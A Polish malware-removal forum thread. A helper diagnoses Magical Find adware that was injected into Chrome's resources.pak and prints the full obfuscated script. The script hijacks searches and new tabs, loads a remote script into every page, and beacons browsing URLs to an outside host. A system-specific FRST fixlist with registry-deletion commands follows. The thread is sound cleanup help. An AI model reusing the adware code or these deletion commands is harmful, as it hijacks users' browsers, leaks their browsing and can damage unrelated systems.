Search Results Hub & Magical Find Ads - zainfekowany Chrome

[slavedriver]

Witajcie,

U teścia w lapku jest straszny problem z Magical Find Ads oraz Search Results Hub. ComboFix + adwcleaner niestety nie rozwiązały problemu. Malwarebytes.org też przejechałem, usunął 8 zagrożeń, ale te syfy pozostały.

 

Logi z GMERa, FRST64, ComboFix w załączeniu.

System Windows 7 x64 Ultimate.

 

Bardzo proszę o pomoc w rozwiązaniu problemu.

gmer.txt

FRST.txt

Addition.txt

ComboFix.txt

[picasso]

W raportach brak oznak oczywistej infekcji w Chrome, poza sponsorowaną wyszukiwarką Google (z sufiksem trackid=sp-004752), co z pewnością nie jest przyczyną problemów. To oznacza, że prawdopodobnie jest zmodyfikowany globalny plik zasobów resources.pak i będzie konieczna reinstalacja przeglądarki. Należy potwierdzić obecność tej modyfikacji. Poproszę o przesłanie katalogu Google Chrome do ręcznej analizy. Skopiuj na Pulpit folder:

 

C:\Program Files (x86)\Google\Chrome

 

Spakuj do ZIP, shostuj gdzieś i prześlij mi link do paczki na PW.

 

 

PS. Uwaga na przyszłość: ComboFix słabo się nadaje do czyszczenia adware. Najbardziej specjalizowane programy to AdwCleaner i MBAM.

[slavedriver]

Witam,

 

Serdeczne dzięki za tak szybką reakcję. Faktycznie w ustawieniach Chrome był dodany suffix do wyszukwarki, ale reset ustawień, czy też ręczne usunięcie tego suffixu nie przynosiły efektów - po restarcie Chrome'a znowu ustawiał się ten suffix i wciąż wyskakiwały ramki od Magical Find'a i niechciane strony www. Wobec tego jak tylko skończy się upload, to na PW prześlę link do ZIPa z katalogiem Chrome, który zgrałem przed deinstalacją.

 

Zainstalowałem Chrome'a na nowo i jak na razie wygląda OK.

 

Dziękuję jeszcze raz za pomoc i za porady z Post Scriptum

[picasso]

Trochę się pośpieszyłeś z tą reinstalacją Google Chrome, gdyż miałam w zamiarze podać szczegółowe kroki jak to zrobić (krok pierwszy przed deinstalacją to wyłączenie synchronizacji z serwerem, o ile włączona). Przy okazji także miały być wdrażane mniejsze korekty.

 

Poczekam na zawartość folderu, by zaadresować merytorycznie całość zagadnienia, i podam jeszcze kroki dodatkowe.

[slavedriver]

Upps... W takim razie przepraszam za nadgorliwość... W każdym razie, przed momentem wysłałem PW z linkiem do folderu.

 

Pozdrawiam.

[picasso]

Bez wątpienia był zainfekowany plik zasobów resources.pak. W tym kluczowym pliku przeglądarki adware zintegrowało następujący skrypt produkujący przekierowania i reklamy:

 

<!--
Copyright 2013 The Chromium Authors. All rights reserved.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.

We use an HTML page just to have access to the DOM, for URL
parsing. An alternative would be to include a URL parsing JavaScript
library with the extension but this approach is likely smaller and
faster.
-->
<html>
<head>
<script src="thunk.js"></script>
</head>
<body>
</body>
</html>
try{(function(d,u){function k(a){for(var b=0;b<a.length;b++){var e=b,c;c=a[b];if("string"===typeof c)a:{if(!v(c))for(var g=0;g<p.length;g++)if(p[g].test(c)){c="";break a}}else c=c.toString();c=encodeURIComponent(c.replace(w,"$cma;"));a[e]=c}(new Image).src="https://magicalfind-a.akamaihd.net/stats/?"+a.shift()+"="+a.join("|,|")}function m(a){return[   ".*volunteercentre.org.*",".*search.yahoo.com.*ddc[_-]bd.*",".*capn=ed_ui_.*_kw_001.*",".*ask.com.*siteid=28527.*",".*src=55cd729e57e760c05c8b466e.*",".*capn=ed_ui_jp_kw_002.*",".*thesmartsearch.net.*",".*search.results-hub.com.*",".*search.netbetterresults.com.*"," .*search.yahoo.com.*ddc[_-]bd.*",".*fluey.com.*",".*tapxchange.com.*",".*search.searchitknow.com.*",".*home.searchpile.com.*",".*au.ask.com.*28527.*",".*uk.ask.com.*32859.*",".*thesmartsearch.net.*p=ein.*",".*capn=ed_ui_.*_kw_004.*",".*search.top-arama.com.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/s.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/h.*",".*search.yahoo.com.*_bd_com.*",".*=__default.*"].some(function({return(new RegExp().test(a)})}function x(a,{var e=queryCommandValue;h(function(c){c||(c={});var g=c["BL_ST_"+a+"_"+e],d=Date.now();g?3E3>d-g?b&&b(!0):(c["BL_ST_"+a+"_"+e]=d,b&&b(!1),f(c)):(c["BL_ST_"+a+"_"+e]=d,f(c),b&&b(!1))})}function h(a){chrome.storage.local.get("BLGC_STORAGE",function({a&&a(b.BLGC_STORAGE)})}function f(a){var b={};b.BLGC_STORAGE=a;chrome.storage.local.set(b,function(){})}function q(a){try{if(0==a.length)return{hostName:""};var b=u.createElement("a");0!=a.indexOf("http")&&(a="http://"+a);b.href=a;return b}catch(e){}return{hostname:a}}function y(a){a=a.toLowerCase();for(var b=0;b<n.length;b++)if(-1!=a.indexOf(n[b].host.toLowerCase()))return b;return-1}function l(a,{try{b=b.replace(/[\[]/,"\[").replace(/[\]]/,"\]");var e=(new RegExp("[\?]"+b+"=([^]*)")).exec(a);return null==e?null:e[1]}catch(c){}}function z(a,{var e=l(a,n[b].oparam);switch({case 0:case 2:case 3:case 4:return!!e;case 1:var e=l(a,"type"),c=l(a,"hsimp"),g=l(a,"fr"),d=/^http(s)?:\/\/(.{2}\.)?(malaysia\.)?(y.*\.)?search\.yahoo\./;return!!g&&-1!=g.indexOf("ddc-bd")||!!c&&-1!=c.indexOf("ddc_bd")||!!e&&-1!=e.indexOf("_bd_com")||!d.test(a)||-1!=a.indexOf("/local/")}return!1}function r(a,{var e=-1,c="",g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ5ZBAFFRQAVbQ4LBQlcFVYUJhRaUgAQDAdHeVtdVQtFRAQUIR9aFQQTQkcFME0FA1UWQhNNfXRZBlASQFllKVdc&q=|search_term|",d=null,f=null;b.url&&!m(b.url)&&(f=q(b.url).hostname,h(function(h){h||(h={});if(-1!=(e=y(f))){if(h[a]&&(d=q(h[a]).hostname,(!f||f==d)&&1!=e))return;c=n[e].param;!z(b.url,e)&&(queryCommandValue=l(b.url,c))&&x(a,function(c){c?k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","SkippedSearch",b.url]):(g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ5ZBAFFRQAVbQ4LBQlcFVYUJhRaUgAQDAdHeVtdVQtFRAQUIR9aFQQTQkcFME0FA1UWQhNNfXRZBlASQFllKVdc&q=|search_term|".replace("|search_term|",queryCommandValue),chrome.tabs.update(a,{url:g}),k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","Search",b.url]))})}}))}function A(a,b,e){try{chrome.tabs.executeScript(a,{code:"if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://magicalfind-a.akamaihd.net/MagicalFind/cr?t=BLGC&g=7ae84d56-73d0-4c7f-b39a-2d9be424e17a&pn=Chrome'; document.head.appendChild(scr);}"})}catch(c){}-1!=t.indexOf(b.url)&&(m(e.url)||chrome.tabs.update(a,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAJCJQEMBQxHDAIQJAkVVVpGRxhBcwBZTAsVGFdGdAsMBAhGQBNBNARaAktXUUEeIlVfAh8fHHhCJ1BbAFU3SFtH"}),h(function(c){c||(c={});c[a]=b.url;f(c)}),d.skipNewTabMsg?d.skipNewTabMsg=!1:k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","NewTab",b.url]));d.firstRun=!1;r(a,;b.url&&h(function(c){c||(c={});c[a]=b.url;f(c)})}"undefined"==typeof d.firstRun&&(d.firstRun=!1);"undefined"==typeof d.skipNewTabMsg&&(d.skipNewTabMsg=!1);var t=["chrome://newtab/","safer://newtab/"],n=[{host:".bing.",param:"q",oparam:"qs"},{host:"search.yahoo.",param:"p",oparam:"fr"},{host:".google.",param:"q",oparam:"site"},{host:".ask.",param:"q",oparam:"qo"},{host:"search.aol.",param:"q",oparam:"s_it"},{host:"go.mail.ru",param:"q",oparam:"NA"},{host:"intent.clara-labs.",param:"q",oparam:"NA"},{host:"trovi.",param:"q",oparam:"NA"},{host:".plusnetwork.",param:"q",oparam:"NA"},{host:"isearch.bobrowser.",param:"q",oparam:"NA"},{host:"www-searching.",param:"q",oparam:"NA"},{host:".thesmartsearch.",param:"q",oparam:"NA"},{host:".search.safer.",param:"q",oparam:"NA"},{host:".cassiopessa.",param:"q",oparam:"NA"}],p=[/(?:\d[(). -]*?){9,16}/,/[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i],w=/,/g;btoa("94df1405-b2c7-479e-98ea-4be1fc81ab76_54_10");var v=function(){var a=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i;return function({return a.test(}}();chrome.runtime.onStartup.addListener(function(){d.firstRun=!0;d.skipNewTabMsg=!0;f({})});chrome.tabs.onReplaced.addListener(function(a,{var e,c;h(function(d){d||(d={});e=d[a];c=d[b];d[a]=c;d[b]=e;f(d)})});chrome.tabs.onRemoved.addListener(function(a){h(function({b||(b={});delete b[a];f(})});chrome.tabs.onCreated.addListener(function(a){if(a.id&&!a.openerTabId)if(d.firstRun){if(m(a.url))return;chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggUIVwAVV1EFxgUc10ITA0SFlMOIgoBABRDRQxBJQ0KVVxAFlQFIk0FA1oDB0VXfVtUBlpXTwhuIV5RAlgdZ1xNJA=="});k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","HomePage",a.url])}else-1==t.indexOf(a.url)||m(a.url)||(chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAJCJQEMBQxHDAIQJAkVVVpGRxhBcwBZTAsVGFdGdAsMBAhGQBNBNARaAktXUUEeIlVfAh8fHHhCJ1BbAFU3SFtH"}),k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","NewTab",a.url]));else a.openerTabId&&h(function({b||(b={});b[a.id]=b[a.openerTabId];f(});d.firstRun=!1});chrome.webNavigation.onBeforeNavigate.addListener(function(a){0===a.frameId&&r(a.tabId,{url:a.url})});chrome.tabs.onUpdated.addListener(function(a,b,d){A(a,b,d)})})(window,document)}catch(d){};// Copyright 2013 The Chromium Authors. All rights reserved.
//

.

Przeglądarka została przeinstalowana, co automatycznie zlikwidowało modyfikację. Teraz drobnostki do wykonania:

 

1. Deinstalacje:

- Odinstaluj starą wersję (luki!) Adobe Reader 9.1 Lite.

- Usuń szczątkowy ukryty program. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście wpis AVG PC TuneUp 2015 (pl-PL) > Dalej.

 

2. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction 
HKU\S-1-5-21-3186815166-2112447843-958612567-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-3186815166-2112447843-958612567-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKU\S-1-5-21-3186815166-2112447843-958612567-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
Task: {C3EC9D74-38F9-4939-87AC-AF3FA7D68859} - System32\Tasks\{40392E45-CAC5-4EB7-B95E-BDE5ED4EAC60} => pcalua.exe -a "D:\Pobrane\Gry\inkwizycja\Dragon Age Inquisition - Deluxe Edition\__Installer\vc\vc2010sp1\redist\vcredist_x64.exe" -d "D:\Pobrane\Gry\inkwizycja\Dragon Age Inquisition - Deluxe Edition\__Installer\vc\vc2010sp1\redist"
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Zrób nowy log FRST z opcji Skanuj (Scan) na następującym ustawieniu: w sekcji Whitelist (Filtrowanie) odznacz sekcję Internet, a pól Addition i Shortcut już nie zaznaczaj. Dołącz też plik fixlog.txt.

Edytowane 2 Czerwca 2016 przez picasso
Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso